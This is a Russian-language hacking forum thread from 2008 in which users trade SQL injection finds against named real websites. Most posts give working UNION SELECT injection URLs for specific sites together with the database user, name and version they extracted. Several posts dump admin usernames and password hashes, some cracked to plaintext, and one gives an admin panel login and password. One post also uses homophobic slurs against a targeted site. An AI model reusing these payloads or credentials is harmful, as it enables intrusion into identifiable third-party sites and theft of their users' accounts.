SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    CJLO.com
    VERSION: 4.1.21-log
    DATABASE: cjlocom
    USER: cjlocom@localhost

    iqmagazineonline.com
    VERSION: 4.1.20
    DATABASE: iqmag
    USER: iqmag@localhost

    hdtvmagazine.com
    VERSION: 4.1.20-standard-log
    DATABASE: main
    USER: hdtv_web@localhost
    //вывод в title


    OUR-KIEV.com
    VERSION: 5.0.41-community
    USER: ourkiev_ourkiev@localhost
    DATABASE: ourkiev_main

    banksandbrokersfootball.co.uk
    VERSION: 4.0.24_Debian-10sarge2-log
    USER: web176u1@localhost
    DATABASE: web176db1

    outerbanksbeach.com
    VERSION: 4.1.20
    DATABASE: outerbanksbeach
    USER: obbuser@localhost
     
    1 person likes this.
  2. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    ameritron.com кто доковыряет то молодец)
    thermatex.co.uk
    5.0.51-log:[email protected]:thermat_thermatex_co_uk
    kupiteplo.ru
    4.1.21-log:00105446@localhost:db00105446
    locksafe.com.au
    4.1.20-log:[email protected]:locksafe
    blueovalindustries.com
    5.0.51a:webaccess@localhost:blueovalindustries
    provenrepellents.com
    realwheel.net
    4.1.22-standard:realecg_dba@localhost:realecg_real
    harvestsafe.com
    5.0.51a:webaccess@localhost:bluekey2
    adam-rouilly.co.uk
    4.1.22-standard:adam_adam@localhost:adam_adamrouilly
     
  3. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    101.ru
    вывода не добился - а подбирать лень
     
    2 people like this.
  4. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    www.finnews.ru ТИЦ сайтов: finnews.ru - 1300
    http://www.finnews.ru/activity.php?id=50000+union+select+concat_ws(0x3a,username,user_password,user_email,user_icq)+from+phpbb_users+limit+1,1/*

    vsheff:f09dfc16c0947a6db07c337967b2634a:[email protected]:99596309
    хэш не брутится нифига и к аське не пдходит
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    159932
    вот вывод ты со столбцами ошибся:
    _http://www.101.ru/?an=guest_book&kw1=-33'+union+select+1,2,3,4,5,6,version(),8,user(),database(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
     
    1 person likes this.
  6. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    www.dom-zdorovja.ru
    Code:
    http://www.dom-zdorovja.ru/doc.php?id=0x3727%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6/*
    domzdor7_alexey@localhost:domzdor7_shop:4.1.22-log

    www.brendgoda.ru
    Code:
    http://brendgoda.ru/ru/news/index.php?id=0x363227%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10/*
    bestbrand@localhost:bestbrand:4.1.22
     
    3 people like this.
  7. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    elevatemagazine.com
    VERSION: 5.0.22
    USER: root@localhost
    DATABASE: elevatemag

    skratchmagazine.com
    VERSION: 4.0.24-nt
    USER: skratch@localhost
    DATABASE: skratchmagazine

    pkgmagazine.com
    VERSION: 4.1.20
    USER: [email protected]
    DATABASE: pkg

    drumheadmag.com
    VERSION: 4.1.13-standard
    USER: drumhead_head@localhost
    DATABASE: drumhead_drum
     
    3 people like this.
  8. BizzyD

    BizzyD Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    209
    Likes Received:
    118
    Reputations:
    0
    Code:
    http://www.ns.umich.edu/htdocs/public/experts/ExpDisplay.php?ExpID=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/*
    [email protected]:news:4.1.21-max-log 2 4



    Code:
    http://www.unexplained-mysteries.com/viewarticle.php?id=57+union+select+1,2,3,4,5/*
    [email protected]:unexplai_forum:4.1.22-standard-log



    Code:
    http://www.joesportsfan.com/column.php?storyid=99999+union+select+1,2,3,4,5/*
    [email protected]:joesportsfan:5.0.18-standard-log
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Представляю Вашему вниманию сайт МОЛДАВСКИХ ПИ****СОВ (как Вам словосочетание?) :D

    _http://www.gay.md/rus/story.php?sid=-634'+union+select+1,2,3,user(),5,version(),database(),8,9,10,11/*

    gaymd@localhost
    4.1.21
    gaymd_

    Ветка четвёртая ,зато таблица стандартная

    _http://www.gay.md/rus/story.php?sid=-634'+union+select+1,2,3,4,5,concat(name,char(58),password),7,8,9,10,11+from+admins/*

    Обратите внимание на ники
    Сбрутился только один ,но я особо не напрягался

    ViPer:dbd61e1da28f924ca21824e86e5a70ad
    adm_lsb:95686fcef2ab9409831daa39852d4137
    nataly:d5a4f7de4b6edd081fb6ff7fabdda89b
    Junkie:1cb870fedd2196045a50916f3529f653
    SSS:5ebe2294ecd0e0f08eab7690d2a6ee69 =secret

    Не нравятся они мне очень :p
     
    2 people like this.
  10. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    webpagemaintenance.com
    VERSION: 4.0.20-Max
    USER: wpm@localhost
    DATABASE: wpmdb

    web-site-development.biz
    VERSION: 4.1.22-log
    USER: wsd@localhost
    DATABASE: wsd_site

    mh1webdesign.com
    VERSION: 4.1.22-standard
    USER: mh1webde_mikey@localhost
    DATABASE: mh1webde_articles

    simplewebinc.com
    VERSION: 4.1.22-standard
    USER: simple@localhost
    DATABASE: simple_greeting
     
  11. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    http://www.pchardware.ro/Download/index.php?catid=-2+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11/*

    a0lb5v@localhost
    a00la
    4.1.12


    http://www.idapp.org/faqs/index.php?catid=-5+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12/*
     
    #4951 neon_fx, 3 Mar 2008
    Last edited: 3 Mar 2008
  12. Saime

    Saime Member

    Joined:
    27 Feb 2008
    Messages:
    19
    Likes Received:
    11
    Reputations:
    -1
    voiloo.net

    voiloo@localhost:voiloo:5.0.32-Debian_7-log

    admin:[email protected]:faba9f262f73605bb0ad8f2ff4ae19d1

    admin:springfield

    ///

    hemija.net

    igor@localhost:5.0.45-log:hemija
     
  13. Saime

    Saime Member

    Joined:
    27 Feb 2008
    Messages:
    19
    Likes Received:
    11
    Reputations:
    -1
    freshairtimes.com

    [email protected]:5.0.18:scammerz
    -----

    askimam.org

    [email protected]:5.0.41-community-nt:askimam
    [email protected]:sufi@usa
    [email protected]:nasir
     
    #4953 Saime, 3 Mar 2008
    Last edited: 3 Mar 2008
  14. SIdoy

    SIdoy Member

    Joined:
    19 Sep 2007
    Messages:
    12
    Likes Received:
    6
    Reputations:
    0
    www.vetmag.ru

    http://www.vetmag.ru/admin/
    login:vetmag
    pass:moromo33



    www.vettorg.ru

     
    3 people like this.
  15. Saime

    Saime Member

    Joined:
    27 Feb 2008
    Messages:
    19
    Likes Received:
    11
    Reputations:
    -1
    kungfumagazine.com

    root@localhost:4.0.22:kungfu
    root:07c02f3e4a89a46b
     
    1 person likes this.
  16. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    http://www.ve.free-travels.ru/
    Code:
    http://ve.free-travels.ru/books/item.php?id=0x3127%20union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15/*
    freetravels_db@localhost:freetravels_db:5.0.27-log

    http://www.maxilog.su/
    Code:
    http://www.maxilog.su/see_news.php?storyid=0x363227%20union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11,12,13,14,15,16,17,18,19/*
    [email protected]:db_maxilog1:5.0.24-standard

    Ну просто так :rolleyes:
    Code:
    http://www.fernando-heitor.de/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    http://www.dan-werbe.net/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    http://www.annuairedesecoles.net/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    http://www.annuairedesecoles.com/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    http://www.empleopropio.com/empleos/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    
     
    4 people like this.
  17. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Ziggy Marley
    Вот ща че то сижу и думаю об этом... (Ну вы меня поняли))) и начал слухать музон Bob Marley и потом че то наткнулся на Ziggy Marley и на его сайт :)
    Ну и сразу нашел инекцию)
    Code:
    [COLOR=Lime][B]http://ziggymarley.com/comments.php?id=194'%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/*[/B][/COLOR]
    
    [email protected]:tuffgong_main:4.1.20-log
    Вот так вот :p
    ббб ; )
     
  18. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    cheap-web-hosting-info.com
    VERSION: 4.1.20-max-log Review и 4.1.20-max-log Plans
    USER: [email protected] Review и [email protected] Plans
    DATABASE: cheapwe_cheapweb Review и cheapwe_cheapweb Plans

    yi-hosting.com
    VERSION: 4.1.22-log
    USER: [email protected]
    DATABASE: michell_data

    visitrandolphcounty.com
    PHP:
    http://www.visitrandolphcounty.com/shopping.php?id=99999+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16/*
    VERSION: 4.1.20
    USER: visitran@localhost
    DATABASE: visitrandolph

    plaza-shopping.com
    VERSION: 4.0.27-max-log
    USER: [email protected]
    DATABASE: plazashopping
     
    1 person likes this.
  19. Digital Cat

    Digital Cat Banned

    Joined:
    4 Feb 2008
    Messages:
    75
    Likes Received:
    78
    Reputations:
    0
    Мальчики, хелп. Вот как выудить из бд пароли? :( Пока все заканчивалось ошибкой((
    http://www.angelbaby.ru/tovar.php?ld=1+union+select+1,2,user(),database(),5,6,7,version(),9,10,11,12,13/*
    Code:
    babykn@localhost 
    5.0.45-community
    babykn_angel
    
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    PROFILING
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    arhiv
    category
    disttxt
    links
    news
    news_img
    others
    pages
    produkt
     
    4 people like this.
  20. BizzyD

    BizzyD Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    209
    Likes Received:
    118
    Reputations:
    0
    Code:
    http://www.ipoding.com/index.php?catid=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
    ipoding@localhost:ipoding_rouge:4.0.21-log
     
Thread Status:
Not open for further replies.